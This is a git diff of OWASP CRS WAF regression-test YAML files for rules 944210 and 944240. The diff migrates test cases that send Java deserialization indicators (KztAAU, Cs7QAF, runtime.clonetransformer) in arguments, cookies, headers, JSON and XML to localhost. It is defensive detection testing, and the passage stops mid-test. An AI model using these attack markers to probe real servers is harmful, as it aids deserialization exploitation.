Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"KztAAU\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"KztAAU\"}" + output: + log: + expect_ids: [944210] + - test_id: 30 desc: "Content-Type application/json arg name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"KztAAU\": \"test\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"KztAAU\": \"test\"}" + output: + log: + expect_ids: [944210] + - test_id: 31 desc: "Content-Type multipart/form-data json arg name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"KztAAU": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-32 + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 32 desc: "Content-Type multipart/form-data json arg value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"KztAAU": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-33 + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 33 desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - KztAAU - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-34 + KztAAU + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 34 desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - KztAAU - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-35 + KztAAU + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 35 desc: "Argument test includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log: + expect_ids: [944210] + - test_id: 36 desc: "Argument name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Cs7QAF=test" - output: - log_contains: "id \"944210\"" - - test_title: 944210-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Cs7QAF=test" + output: + log: + expect_ids: [944210] + - test_id: 37 desc: "Cookie test includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Cs7QAF - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Cs7QAF + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 38 desc: "Cookie name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Cs7QAF=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Cs7QAF=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 39 desc: "Request header test includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Cs7QAF - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Cs7QAF + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 40 desc: "XML element includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944210] + - test_id: 41 desc: "XML attribute name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944210] + - test_id: 42 desc: "XML attribute value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944210] + - test_id: 43 desc: "XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log: + expect_ids: [944210] + - test_id: 44 desc: "Nested XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Cs7QAF" + output: + log: + expect_ids: [944210] + - test_id: 45 desc: "Content-Type text/plain includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log: + expect_ids: [944210] + - test_id: 46 desc: "Content-Type application/json arg value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Cs7QAF\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Cs7QAF\"}" + output: + log: + expect_ids: [944210] + - test_id: 47 desc: "Content-Type application/json arg name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Cs7QAF\": \"test\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Cs7QAF\": \"test\"}" + output: + log: + expect_ids: [944210] + - test_id: 48 desc: "Content-Type multipart/form-data json arg name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"Cs7QAF": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-49 + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 49 desc: "Content-Type multipart/form-data json arg value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"Cs7QAF": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-50 + {"Cs7QAF": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 50 desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - Cs7QAF - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-51 + Cs7QAF + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 51 desc: "Content-Type multipart/form-data XML element value includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - Cs7QAF - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" + Cs7QAF + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml index 17b6ea6..7d5a2ef 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml @@ -1,1791 +1,1789 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944240.yaml" - description: "Positive tests for rule 944240" +rule_id: 944240 tests: - - test_title: 944240-1 + - test_id: 1 desc: "Argument test includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log: + expect_ids: [944240] + - test_id: 2 desc: "Argument name includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.clonetransformer=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.clonetransformer=test" + output: + log: + expect_ids: [944240] + - test_id: 3 desc: "Cookie test includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 4 desc: "Cookie name includes keyword runtime.clonetransformer" stages: - - stage: - input: - 